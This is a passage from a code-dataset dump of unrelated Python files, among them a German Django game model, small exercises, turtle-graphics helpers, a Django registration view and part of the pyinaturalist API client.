\"MA\"), (501, \"N\")]\n stufen = [(500, \"S\"), (400, \"E\"), (300, \"K\"), (200, \"O\"), (100, \"M\"), (0, \"U\")]\n\n if rang < 0:\n return_str = \"-\"\n rang *= -1\n\n # 0 -> generationen, 1 -> stufen\n for i_stufe in range(2):\n list = generationen if not i_stufe else stufen\n\n for i in range(len(list)):\n\n # prohibit e.g. 0US00\n if rang == 0: break\n\n # cases SS and SG\n if i == 0:\n if rang == list[i][0]:\n return_str += list[i][1] + \"0\"\n rang -= list[i][0]\n\n # all other cases descending, if needed\n if rang >= list[i][0]:\n # else only for US, therefore prefix != 0 only there possible\n digit = rang // list[i][0] - 1 if list[i][0] else rang\n\n prefix = digit // 10\n postfix = digit % 10\n\n # prefix-digit\n if prefix != 1: return_str += \"{}\".format(prefix)\n # Kürzel\n return_str += list[i][1]\n # postfix-digit\n if postfix != 0: return_str += \"{}\".format(postfix)\n\n # else only for US\n rang = rang % list[i][0] if list[i][0] else 0\n\n # add '-/' in between\n if len(return_str) and return_str[-1:] != \"/\":\n return_str += \"-/\"\n\n # end inner for\n\n # add the letter G | S accordingly\n if return_str:\n try:\n start = re.search(\"\\D\\d*-/$\", return_str).start()\n letter = \"G\" if not i_stufe else \"S\"\n return_str = return_str[:start+1] + letter + return_str[start+1:-2]\n except:\n letter = \"G\" if not i_stufe else \"S\"\n print(\"No start found in {} for {}\".format(letter, self.name))\n\n # transfer string back\n if not i_stufe:\n return_generationen = return_str\n else:\n return_stufen = return_str\n return_str = \"\"\n\n # end outer for (generationen & stufen)\n\n if len(return_generationen) and len(return_stufen):\n return_generationen += \"-\"\n\n return return_generationen + return_stufen\n\n def größe_(self):\n return decimal_to_str(self.größe)\n\n def gewicht_(self):\n return decimal_to_str(self.gewicht)\n\n def __str__(self):\n return \"{} (Rang {})\".format(self.name, self.rang)\n\n\nclass Typ(models.Model):\n class Meta:\n verbose_name = \"Typ\"\n verbose_name_plural = \"Typen\"\n ordering = [\"titel\"]\n\n titel = models.CharField(max_length=20, default=\"\")\n effektiv_gegen = models.ManyToManyField(\"Typ\", related_name=\"effektiv\", related_query_name=\"effektiv\", blank=True)\n schwach_gegen = models.ManyToManyField(\"Typ\", related_name=\"schwach\", related_query_name=\"schwach\", blank=True)\n wirkungslos_gegen = models.ManyToManyField(\"Typ\", related_name=\"wirkungslos\", related_query_name=\"wirkungslos\", blank=True)\n\n def __str__(self):\n return self.titel\n\n\nclass Attacke(models.Model):\n class Meta:\n verbose_name = \"Attacke\"\n verbose_name_plural = \"Attacken\"\n ordering = [\"titel\"]\n\n titel = models.CharField(max_length=20, unique=True)\n typen = models.ManyToManyField(Typ, blank=True)\n schaden = models.CharField(max_length=20, null=True, blank=True)\n beschreibung = models.TextField(max_length=3000, null=True, blank=True)\n\n def __str__(self):\n typen = \", \".join([t.titel for t in self.typen.all()])\n return \"{} ({}; {} HP)\".format(self.titel, typen if typen else \"-\", self.schaden)\n","sub_path":"ppServer/monster/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"590523308","text":"class Email:\r\n\r\n def __init__(self, sender, receiver, content):\r\n self.sender = sender\r\n self.receiver = receiver\r\n self.content = content\r\n self.is_send = False\r\n\r\n def send(self):\r\n self.is_send = True\r\n\r\n def get_info(self):\r\n return f'{self.sender} says to {self.receiver}: {self.content}. Sent: {self.is_send}'\r\n\r\n\r\nemails = []\r\n\r\nline = input()\r\nwhile line != 'Stop':\r\n token = line.split(' ', maxsplit=2)\r\n sender = token[0]\r\n receiver = token[1]\r\n content = token[2]\r\n email = Email(sender, receiver, content)\r\n emails.append(email)\r\n\r\n line = input()\r\n\r\nsend_emails = list(map(int, input().split(', ')))\r\n\r\nfor x in send_emails:\r\n emails[x].send()\r\n\r\nfor email in emails:\r\n print(email.get_info())","sub_path":"Emails.py","file_name":"Emails.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"96292439","text":"from django.urls import register_converter, path, include\n\nfrom . import views, converters\n\nregister_converter(converters.ProductConverter, 'product')\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('logout', views.logout, name='logout'),\n path('products//', views.product_detail,\n name='product_detail'),\n path('usage', views.usage, name='usage'),\n]\n","sub_path":"marketplace/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"52091749","text":"\r\ndef vowelRemoval(string):\r\n VOWELS = (\"a\", \"e\", \"i\", \"o\", \"u\")\r\n if len(string) == 0:\r\n return string\r\n else:\r\n newString = string[1:len(string) + 1]\r\n firstLetter = string[0]\r\n \r\n if firstLetter in VOWELS:\r\n\r\n return vowelRemoval(newString)\r\n else:\r\n return firstLetter + vowelRemoval(newString)\r\n","sub_path":"Programming Coursework Completed/question 8.py","file_name":"question 8.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"134515188","text":"from django.contrib.admin.views.decorators import staff_member_required\nfrom django.shortcuts import render, redirect\nfrom django.views.generic.base import View\nfrom .forms import RegistrarInscricaoForm, RegistrarDocumentoForm\nfrom sc4net import get_json\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom .models import Candidato, Documento\nfrom cadastro.models import Usuario\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\n\n# class RegistrarInscricaoView(LoginRequiredMixin, View):\nclass RegistrarInscricaoView(View):\n template_name = 'inscricao/dados_pessoais.html'\n\n # @method_decorator(login_required)\n def get(self, request):\n return render(request, self.template_name)\n\n # @method_decorator(login_required)\n def post(self, request):\n form = RegistrarInscricaoForm(request.POST)\n\n if form.is_valid():\n dados_form = form.data\n inscrito = Usuario.objects.get(cpf=dados_form['cpf'])\n inscricao = Candidato.objects.create(usuario = inscrito,\n nome_civil=dados_form['nome_civil'],\n nome_social=dados_form['nome_social'],\n nome_apresentacao=dados_form['nome_apresentacao'],\n nome_usual=dados_form['nome_usual'],\n nome_mae=dados_form['nome_mae'],\n nome_pai=dados_form['nome_pai'],\n sexo=dados_form['sexo'],\n data_nascimento=dados_form['data_nascimento'],\n pais_nascimento=dados_form['pais_nascimento'],\n estado_nascimento=dados_form['estado_nascimento'],\n cidade_nascimento=dados_form['cidade_nascimento'],\n rg=dados_form['rg'],\n data_emissao=dados_form['data_emissao'],\n orgao_rg=dados_form['orgao_rg'],\n estado_emissao=dados_form['estado_emissao'],\n email=dados_form['email'],\n telefone=dados_form['telefone'],\n cep=dados_form['cep'],\n endereco=dados_form['endereco'],\n complemento=dados_form['complemento'],\n cidade=dados_form['cidade'],\n estado=dados_form['estado'],\n pais=dados_form['pais'],\n )\n\n # form1 = RegistrarDocumentoForm(request.POST)\n\n # if form1.is_valid():\n # dados_form1 = form1.data\n documento_pessoal = Documento.objects.create(candidato = inscricao,\n titulo=\"documentação pessoal\",\n arquivo=request.POST['doc_pessoal'],\n )\n documento_titulo = Documento.objects.create(candidato=inscricao,\n titulo=\"documentação de títulos\",\n arquivo=request.POST['doc_titulo'],\n )\n documento_escolar = Documento.objects.create(candidato=inscricao,\n titulo=\"documentação escolar\",\n arquivo=request.POST['doc_escolar'],\n )\n\n\n return redirect('confirmar')\n\n\n return render(request, self.template_name, {'form': form})\n\n\n\n\n def confirmarInscricao(request):\n\n\n return render(request, 'inscricao/confirmardados.html', {'inscricao': Candidato.objects.last(),'documento': Documento.objects.last()})\n\n\n\n def lista_inscricoes(request):\n return render(request, 'inscricao/listagem.html', {'inscricao': Candidato.objects.all(),'documento': Documento.objects.all()})\n\n\n\n\n# class RegistrarDocumentoView(View):\n# template_name = 'inscricao/documentacao.html'\n#\n# def get(self, request):\n# return render(request, self.template_name)\n\n # def registrarDocumento(self, request):\n #\n # render(request, 'inscricao/documentacao.html')\n #\n # form = RegistrarDocumentoForm(request.POST)\n #\n # if form.is_valid():\n # dados_form = form.data\n #\n #\n # documento = Documento.objects.create(titulo=dados_form['titulo'],\n # arquivo=request.POST['doc_pessoal'],\n # )\n #\n #\n # documento.save()\n #\n # # inscricao = Inscricao.objects.create(numero = 1,\n # # candidato = inscricao,\n # # # documento = documento,\n # # )\n # # inscricao.save()\n #\n # return redirect('index')\n #\n # return render(request, self.template_name, {'form': form})\n #","sub_path":"inscricao/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"307919227","text":"import sqlite3\n\nconn = sqlite3.connect('example.db')\nc=conn.cursor()\n\nc.execute('''CREATE TABLE emails\n\t\t\t(id integer, email text)''')\nfor i in range(100000):\n\tspan1 = i\n\tspan2 = \"row\" + str(i)\n\titem = (span1, span2)\n\tc.execute(\"INSERT INTO emails VALUES (?,?)\", item)\n\nconn.commit()\nconn.close()","sub_path":"sqlite.py","file_name":"sqlite.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"78145448","text":"# fix for optcdftsp bug in another script that ran cdftsp on unoptimized geometry\n# this script takes optcdftsp.out file/directory and creates cdftsp.in using optimized geometry\n# check file names first to prevent overwriting\n\nimport ChemData as CD\nimport os, sys\n\ndef run(infile): # optcdftsp.out\n # note that new .xyz and .in files will be placed in same directory as infile\n\n if infile.split('.')[-1] != \"out\":\n return None\n\n # write optimized coordinates to a new .xyz with the same file name\n xyz_fn = infile.split('.')[0] + \".xyz\"\n xyz = CD.ConvergedCoordGrab(infile)\n if xyz != []:\n CD.WriteXYZ(xyz_fn, xyz)\n\n# # parse charge, mult, method, basis from infile\n# mol_flag = False\n# with open(infile, 'r') as f:\n# for line in f:\n# if \"METHOD\" in line:\n# method = line[6:].strip()\n# elif \"BASIS\" in line:\n# basis = line[5:].strip()\n# elif mol_flag:\n# mol_flag = False\n# try:\n# charge, multiplicity = int(line.split(' ')[0]), int(line.split(' ')[-1])\n# except:\n# continue\n# elif \"$molecule\" in line:\n# mol_flag = True\n\n # generate cdftsp.in # change qcMultIn.py path if necessary\n #os.system(\"python qcMultIn.py -f %s -c %d -m %d -method %s -basis %s -j cdftsp\" %(xyz_fn, charge, multiplicity, method, basis))\n\nif __name__ == \"__main__\":\n input = sys.argv[1].rstrip('/')\n if os.path.isfile(input):\n run(input)\n elif os.path.isdir(input):\n for file in os.listdir(input):\n run(input + '/' + file)\n else:\n print(\"Input should be a file or directory.\")\n","sub_path":"opt_coords.py","file_name":"opt_coords.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"141344443","text":"import turtle\r\nimport math\r\n\r\n\r\ndef move(turtle, x, y):\r\n \"\"\"\r\n Set up position of the given turtle\r\n \"\"\"\r\n turtle.penup()\r\n old_speed = turtle.speed()\r\n turtle.speed(0)\r\n turtle.setx(x)\r\n turtle.sety(y)\r\n turtle.speed(old_speed)\r\n turtle.pendown()\r\n\r\n\r\ndef make_window(color, title, width=1200, height=900):\r\n \"\"\"\r\n Set up the window with the given background color and title.\r\n Returns the new window.\r\n \"\"\"\r\n # https://stackoverflow.com/questions/56528067/how-can-i-change-the-size-of-my-python-turtle-window\r\n wn = turtle.Screen()\r\n wn.setup(width + 4, height + 8)\r\n wn.setworldcoordinates(0, 0, 1000, 850)\r\n wn.bgcolor(color)\r\n wn.title(title)\r\n return wn\r\n\r\n\r\ndef make_turtle(color, size, x = 0, y = 0, shape='turtle'):\r\n \"\"\"\r\n Set up a turtle with the given color and pensize.\r\n Returns the new turtle.\r\n \"\"\"\r\n t = turtle.Turtle()\r\n t.color(color)\r\n t.pensize(size)\r\n t.shape(shape)\r\n move(t, x, y)\r\n return t\r\n\r\n\r\ndef get_border_sizes(wn):\r\n x_min, x_max = - wn.window_width() // 2, wn.window_width() // 2\r\n y_min, y_max = - wn.window_height() // 2, wn.window_height() // 2\r\n return x_min, x_max, y_min, y_max\r\n\r\n\r\ndef print_text(x, y, textlines, color=\"black\", fontinfo=(\"Arial\", 15, \"normal\")):\r\n t = make_turtle(color, 1, x, y, shape=\"arrow\")\r\n t.speed(0)\r\n for line in textlines:\r\n _, fontsize, _ = fontinfo\r\n t.write(line, font=fontinfo)\r\n move(t, x, y - fontsize * 1.5)\r\n move(t, -10, -10)\r\n t.penup()\r\n del(t)\r\n\r\n\r\ndef draw_line(x1, y1, x2, y2, color, size, shape='arrow'):\r\n t = make_turtle(color, size, x1, y1, shape)\r\n t.pensize(size)\r\n t.speed(0)\r\n t.goto(x2, y2)\r\n t.penup()\r\n del(t)\r\n\r\n\r\ndef draw_polygon(\r\n turtle,\r\n angles,\r\n side,\r\n start_angle,\r\n sector_angle = 360,\r\n counterclockwise = True\r\n ):\r\n turtle.setheading(180 - start_angle)\r\n for i in range(int(angles * sector_angle / 360)):\r\n turtle.forward(side)\r\n if counterclockwise:\r\n turtle.left(360 / angles)\r\n else:\r\n turtle.right(360 / angles)\r\n\r\n\r\ndef draw_circle(turtle, radius, start_angle, counterclockwise = True):\r\n ANGLES = 100\r\n\r\n side = 2 * radius * math.sin(math.radians(360 / (2 * ANGLES)))\r\n draw_polygon(turtle, ANGLES, side, start_angle, 360, counterclockwise)\r\n\r\n\r\ndef draw_arc(\r\n turtle,\r\n radius,\r\n start_angle,\r\n sector_angle = 180,\r\n counterclockwise = True\r\n ):\r\n\r\n ANGLES = 70\r\n\r\n side = 2 * radius * math.sin(math.radians(360 / (2 * ANGLES)))\r\n draw_polygon(turtle,\r\n ANGLES,\r\n side,\r\n start_angle,\r\n sector_angle,\r\n counterclockwise\r\n )\r\n","sub_path":"6_turtle-2/Bouncing ball/turtle_helper.py","file_name":"turtle_helper.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"331870277","text":"\"\"\"\nCode to access the Node-based iNaturalist API\nSee: http://api.inaturalist.org/v1/docs/\n\nMost recent API version tested: 1.3.0\n\nFunctions\n---------\n\n.. automodsumm:: pyinaturalist.node_api\n :functions-only:\n :nosignatures:\n\n\"\"\"\nfrom logging import getLogger\nfrom typing import List\nfrom warnings import warn\n\nimport requests\n\nfrom pyinaturalist import api_docs as docs\nfrom pyinaturalist.api_requests import get\nfrom pyinaturalist.constants import API_V1_BASE_URL, HistogramResponse, JsonResponse, MultiInt\nfrom pyinaturalist.exceptions import ObservationNotFound, TaxonNotFound\nfrom pyinaturalist.forge_utils import document_request_params\nfrom pyinaturalist.pagination import add_paginate_all, paginate_all\nfrom pyinaturalist.request_params import (\n DEFAULT_OBSERVATION_ATTRS,\n NODE_OBS_ORDER_BY_PROPERTIES,\n PROJECT_ORDER_BY_PROPERTIES,\n translate_rank_range,\n validate_multiple_choice_param,\n)\nfrom pyinaturalist.response_format import (\n as_geojson_feature_collection,\n convert_all_coordinates,\n convert_all_place_coordinates,\n convert_all_timestamps,\n convert_generic_timestamps,\n convert_observation_timestamps,\n format_histogram,\n)\n\n__all__ = [\n 'get_controlled_terms',\n 'get_identifications_by_id',\n 'get_identifications',\n 'get_observation',\n 'get_observation_histogram',\n 'get_observations',\n 'get_observation_species_counts',\n 'get_geojson_observations',\n 'get_observation_observers',\n 'get_observation_identifiers',\n 'get_places_by_id',\n 'get_places_nearby',\n 'get_places_autocomplete',\n 'get_projects',\n 'get_projects_by_id',\n 'get_taxa',\n 'get_taxa_by_id',\n 'get_taxa_autocomplete',\n 'get_user_by_id',\n 'get_users_autocomplete',\n 'search',\n]\nlogger = getLogger(__name__)\n\n\ndef node_api_get(endpoint: str, **kwargs) -> requests.Response:\n \"\"\"Make an API call to iNaturalist.\n\n Args:\n endpoint: The name of an endpoint resource, not including the base URL e.g. 'observations'\n kwargs: Arguments for :py:func:`.api_requests.request`\n \"\"\"\n return get(f'{API_V1_BASE_URL}/{endpoint}', **kwargs)\n\n\n# Controlled Terms\n# --------------------\n\n\ndef get_controlled_terms(taxon_id: int = None, user_agent: str = None) -> JsonResponse:\n \"\"\"List controlled terms and their possible values.\n A taxon ID can optionally be provided to show only terms that are valid for that taxon.\n Otherwise, all controlled terms will be returned.\n\n **API reference:**\n\n * https://api.inaturalist.org/v1/docs/#!/Controlled_Terms/get_controlled_terms\n * https://api.inaturalist.org/v1/docs/#!/Controlled_Terms/get_controlled_terms_for_taxon\n\n Example:\n\n >>> response = get_controlled_terms()\n >>> print(format_controlled_terms(response))\n 1: Life Stage\n 2: Adult\n 3: Teneral\n 4: Pupa\n ...\n\n .. admonition:: Example Response (all terms)\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_controlled_terms.json\n :language: JSON\n\n .. admonition:: Example Response (for a specific taxon)\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_controlled_terms_for_taxon.json\n :language: JSON\n Args:\n taxon_id: ID of taxon to get controlled terms for\n user_agent: a user-agent string that will be passed to iNaturalist.\n\n Returns:\n A dict containing details on controlled terms and their values\n\n Raises:\n :py:exc:`.TaxonNotFound` If an invalid taxon_id is specified\n \"\"\"\n # This is actually two endpoints, but they are so similar it seems best to combine them\n endpoint = 'controlled_terms/for_taxon' if taxon_id else 'controlled_terms'\n response = node_api_get(endpoint, params={'taxon_id': taxon_id}, user_agent=user_agent)\n\n # controlled_terms/for_taxon returns a 422 if the specified taxon does not exist\n if response.status_code in (404, 422):\n raise TaxonNotFound\n response.raise_for_status()\n return response.json()\n\n\n# Identifications\n# --------------------\n\n\ndef get_identifications_by_id(identification_id: MultiInt, user_agent: str = None) -> JsonResponse:\n \"\"\"Get one or more identification records by ID.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Identifications/get_identifications_id\n\n Example:\n\n >>> get_identifications_by_id(155554373)\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_identifications.py\n\n Args:\n identification_id: Get taxa with this ID. Multiple values are allowed.\n\n Returns:\n Response dict containing identification records\n \"\"\"\n r = node_api_get('identifications', ids=identification_id, user_agent=user_agent)\n r.raise_for_status()\n\n identifications = r.json()\n identifications['results'] = convert_all_timestamps(identifications['results'])\n return identifications\n\n\n@document_request_params([docs._identification_params, docs._pagination, docs._only_id])\n@add_paginate_all(method='page')\ndef get_identifications(**params) -> JsonResponse:\n \"\"\"Search identifications.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Identifications/get_identifications\n\n Example:\n\n Get all of your own species-level identifications:\n\n >>> response = get_identifications(user_login='my_username', rank='species')\n >>> print([f\"{i['user']['login']}: {i['taxon_id']} ({i['category']})\" for i in response['results']])\n [155043569] Species: 76465 (leading) added on 2021-02-15 10:46:27-06:00 by jkcook\n [153668189] Species: 76465 (supporting) added on 2021-02-06 17:43:37+00:00 by jkcook\n [147500725] Species: 1163860 (improving) added on 2020-12-24 23:52:30+00:00 by jkcook\n ...\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_identifications.py\n\n Returns:\n Response dict containing identification records\n \"\"\"\n params = translate_rank_range(params)\n r = node_api_get('identifications', params=params)\n r.raise_for_status()\n\n identifications = r.json()\n identifications['results'] = convert_all_timestamps(identifications['results'])\n return identifications\n\n\n# Observations\n# --------------------\n\n\ndef get_observation(observation_id: int, user_agent: str = None) -> JsonResponse:\n \"\"\"Get details about a single observation by ID\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Observations/get_observations_id\n\n Example:\n\n >>> response = get_observation(16227955)\n >>> print(format_observations(response))\n [16227955] [493595] Species: Lixus bardanae observed on 2018-09-05 14:06:00+01:00 by niconoe at 54 rue des Badauds\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observation.py\n\n Args:\n observation_id: Observation ID\n user_agent: a user-agent string that will be passed to iNaturalist.\n\n Returns:\n A dict with details on the observation\n\n Raises:\n :py:exc:`.ObservationNotFound` If an invalid observation is specified\n \"\"\"\n\n r = get_observations(id=observation_id, user_agent=user_agent)\n if r['results']:\n return convert_observation_timestamps(r['results'][0])\n\n raise ObservationNotFound()\n\n\n@document_request_params([*docs._get_observations, docs._observation_histogram])\ndef get_observation_histogram(**params) -> HistogramResponse:\n \"\"\"Search observations and return histogram data for the given time interval\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Observations/get_observations_histogram\n\n **Notes:**\n\n * Search parameters are the same as :py:func:`.get_observations()`, with the addition of\n ``date_field`` and ``interval``.\n * ``date_field`` may be either 'observed' (default) or 'created'.\n * Observed date ranges can be filtered by parameters ``d1`` and ``d2``\n * Created date ranges can be filtered by parameters ``created_d1`` and ``created_d2``\n * ``interval`` may be one of: 'year', 'month', 'week', 'day', 'hour', 'month_of_year', or\n 'week_of_year'; spaces are also allowed instead of underscores, e.g. 'month of year'.\n * The year, month, week, day, and hour interval options will set default values for ``d1`` and\n ``created_d1``, to limit the number of groups returned. You can override those values if you\n want data from a longer or shorter time span.\n * The 'hour' interval only works with ``date_field='created'``\n\n Example:\n\n Get observations per month during 2020 in Austria (place ID 8057)\n\n >>> response = get_observation_histogram(\n >>> interval='month',\n >>> d1='2020-01-01',\n >>> d2='2020-12-31',\n >>> place_id=8057,\n >>> )\n\n .. admonition:: Example Response (observations per month of year)\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observation_histogram_month_of_year.py\n\n .. admonition:: Example Response (observations per month)\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observation_histogram_month.py\n\n .. admonition:: Example Response (observations per day)\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observation_histogram_day.py\n\n Returns:\n Dict of ``{time_key: observation_count}``. Keys are ints for 'month of year' and\\\n 'week of year' intervals, and :py:class:`~datetime.datetime` objects for all other intervals.\n \"\"\"\n r = node_api_get('observations/histogram', params=params)\n r.raise_for_status()\n return format_histogram(r.json())\n\n\n@document_request_params([*docs._get_observations, docs._pagination, docs._only_id])\n@add_paginate_all(method='id')\ndef get_observations(**params) -> JsonResponse:\n \"\"\"Search observations.\n\n **API reference:** http://api.inaturalist.org/v1/docs/#!/Observations/get_observations\n\n Example:\n\n Get observations of Monarch butterflies with photos + public location info,\n on a specific date in the provice of Saskatchewan, CA (place ID 7953):\n\n >>> response = get_observations(\n >>> taxon_name='Danaus plexippus',\n >>> created_on='2020-08-27',\n >>> photos=True,\n >>> geo=True,\n >>> geoprivacy='open',\n >>> place_id=7953,\n >>> )\n\n Get basic info for observations in response:\n\n >>> from pyinaturalist.formatters import format_observations\n >>> print(format_observations(response))\n '[57754375] Species: Danaus plexippus (Monarch) observed by samroom on 2020-08-27 at Railway Ave, Wilcox, SK'\n '[57707611] Species: Danaus plexippus (Monarch) observed by ingridt3 on 2020-08-26 at Michener Dr, Regina, SK'\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observations_node.py\n\n Returns:\n Response dict containing observation records\n \"\"\"\n validate_multiple_choice_param(params, 'order_by', NODE_OBS_ORDER_BY_PROPERTIES)\n r = node_api_get('observations', params=params)\n r.raise_for_status()\n\n observations = r.json()\n observations['results'] = convert_all_coordinates(observations['results'])\n observations['results'] = convert_all_timestamps(observations['results'])\n\n return observations\n\n\ndef get_all_observations(**params) -> List[JsonResponse]:\n \"\"\"Deprecated; use ``get_observations(page='all')`` instead\"\"\"\n msg = \"get_all_observations() is deprecated; please use get_observations(page='all') instead\"\n warn(DeprecationWarning(msg))\n return paginate_all(get_observations, method='id', **params)['results']\n\n\n@document_request_params([*docs._get_observations, docs._pagination])\n@add_paginate_all(method='page')\ndef get_observation_species_counts(**params) -> JsonResponse:\n \"\"\"Get all species (or other 'leaf taxa') associated with observations matching the search\n criteria, and the count of observations they are associated with.\n **Leaf taxa** are the leaves of the taxonomic tree, e.g., species, subspecies, variety, etc.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Observations/get_observations_species_counts\n\n Example:\n >>> response = get_observation_species_counts(user_login='my_username', quality_grade='research')\n >>> print(format_species_counts(response))\n [62060] Species: Palomena prasina (Green Shield Bug): 10\n [84804] Species: Graphosoma italicum (European Striped Shield Bug): 8\n [55727] Species: Cymbalaria muralis (Ivy-leaved toadflax): 3\n ...\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observation_species_counts.py\n\n Returns:\n Response dict containing taxon records with counts\n \"\"\"\n r = node_api_get(\n 'observations/species_counts',\n params=params,\n )\n r.raise_for_status()\n return r.json()\n\n\n@document_request_params([*docs._get_observations, docs._geojson_properties])\ndef get_geojson_observations(properties: List[str] = None, **params) -> JsonResponse:\n \"\"\"Get all observation results combined into a GeoJSON ``FeatureCollection``.\n By default this includes some basic observation properties as GeoJSON ``Feature`` properties.\n The ``properties`` argument can be used to override these defaults.\n\n Example:\n >>> get_geojson_observations(observation_id=16227955, properties=['photo_url'])\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observations.geojson\n :language: JSON\n\n Returns:\n A ``FeatureCollection`` containing observation results as ``Feature`` dicts.\n \"\"\"\n params['mappable'] = True\n params['page'] = 'all'\n response = get_observations(**params)\n return as_geojson_feature_collection(\n response['results'],\n properties=properties if properties is not None else DEFAULT_OBSERVATION_ATTRS,\n )\n\n\n@document_request_params([*docs._get_observations, docs._pagination])\ndef get_observation_observers(**params) -> JsonResponse:\n \"\"\"Get observers of observations matching the search criteria and the count of\n observations and distinct taxa of rank species they have observed.\n\n Notes:\n * Options for ``order_by`` are 'observation_count' (default) or 'species_count'\n * This endpoint will only return up to 500 results\n * See this issue for more details: https://github.com/inaturalist/iNaturalistAPI/issues/235\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Observations/get_observations_observers\n\n Example:\n >>> response = get_observation_observers(place_id=72645, order_by='species_count')\n >>> print(format_users(response, align=True))\n [1566366 ] fossa1211\n [674557 ] schurchin\n [5813 ] fluffberger (Fluff Berger)\n\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observation_observers_ex_results.json\n :language: JSON\n\n Returns:\n Response dict of observers\n \"\"\"\n params.setdefault('per_page', 500)\n\n r = node_api_get(\n 'observations/observers',\n params=params,\n )\n r.raise_for_status()\n return r.json()\n\n\n@document_request_params([*docs._get_observations, docs._pagination])\ndef get_observation_identifiers(**params) -> JsonResponse:\n \"\"\"Get identifiers of observations matching the search criteria and the count of\n observations they have identified. By default, results are sorted by ID count in descending.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Observations/get_observations_identifiers\n\n Note: This endpoint will only return up to 500 results.\n\n Example:\n >>> response = get_observation_identifiers(place_id=72645)\n >>> print(format_users(response, align=True))\n [409010 ] jdoe42 (Jane Doe)\n [691216 ] jbrown252 (James Brown)\n [3959037 ] tnsparkleberry\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_observation_identifiers_ex_results.json\n :language: JSON\n\n Returns:\n Response dict of identifiers\n \"\"\"\n params.setdefault('per_page', 500)\n\n r = node_api_get(\n 'observations/identifiers',\n params=params,\n )\n r.raise_for_status()\n return r.json()\n\n\n# Places\n# --------------------\n\n\ndef get_places_by_id(place_id: MultiInt, user_agent: str = None) -> JsonResponse:\n \"\"\"\n Get one or more places by ID.\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Places/get_places_id\n\n Example:\n >>> response = get_places_by_id([67591, 89191])\n >>> print(format_places(response))\n [89191] Conservation Area Riversdale\n [67591] Riversdale Beach\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_places_by_id.py\n\n Args:\n place_id: Get a place with this ID. Multiple values are allowed.\n\n Returns:\n Response dict containing place records\n \"\"\"\n r = node_api_get('places', ids=place_id, user_agent=user_agent)\n r.raise_for_status()\n\n # Convert coordinates to floats\n response = r.json()\n response['results'] = convert_all_coordinates(response['results'])\n return response\n\n\n@document_request_params([docs._bounding_box, docs._name])\ndef get_places_nearby(**params) -> JsonResponse:\n \"\"\"\n Given an bounding box, and an optional name query, return places nearby\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Places/get_places_nearby\n\n Example:\n >>> bounding_box = (150.0, -50.0, -149.999, -49.999)\n >>> response = get_places_nearby(*bounding_box)\n\n Response is split into standard (curated) places and community (non-curated) places:\n\n >>> print(len(response['results']['standard']))\n 10\n >>> print(len(response['results']['community']))\n 10\n\n Show basic info for all places in response:\n\n >>> print(format_places(response, align=True))\n Standard:\n [97394 ] North America\n [97395 ] Asia\n [97393 ] Oceania\n ...\n Community:\n [166719 ] Burgenland (accurate border)\n [11770 ] Mehedinti\n [119755 ] Mahurangi College\n ...\n\n .. admonition:: Example Response\n :class: toggle\n\n .. literalinclude:: ../sample_data/get_places_nearby.py\n\n Returns:\n Response dict containing place records, divided into 'standard' and 'community' places.\n \"\"\"\n r = node_api_get('places/nearby', params=params)\n r.raise_for_status()\n return convert_all_place_coordinates(r.json())\n\n\n@document_request_params([docs._search_query, docs._pagination])\n@add_paginate_all(method='autocomplete')\ndef get_places_autocomplete(q: str = None, **params) -> JsonResponse:\n \"\"\"Given a query string, get places with names starting with the search term\n\n **API reference:** https://api.inaturalist.org/v1/docs/#!/Places/get_places_autocomplete\n\n **Note:** This endpoint accepts a ``per_page`` param, up to a max of 20 (default 10). Pages\n beyond the first page cannot be retrieved. Use ``page=all`` to attempt to retrieve additional\n results. See :py:func:`.paginate_autocomplete` for more info.\n\n Example:\n >>> response = 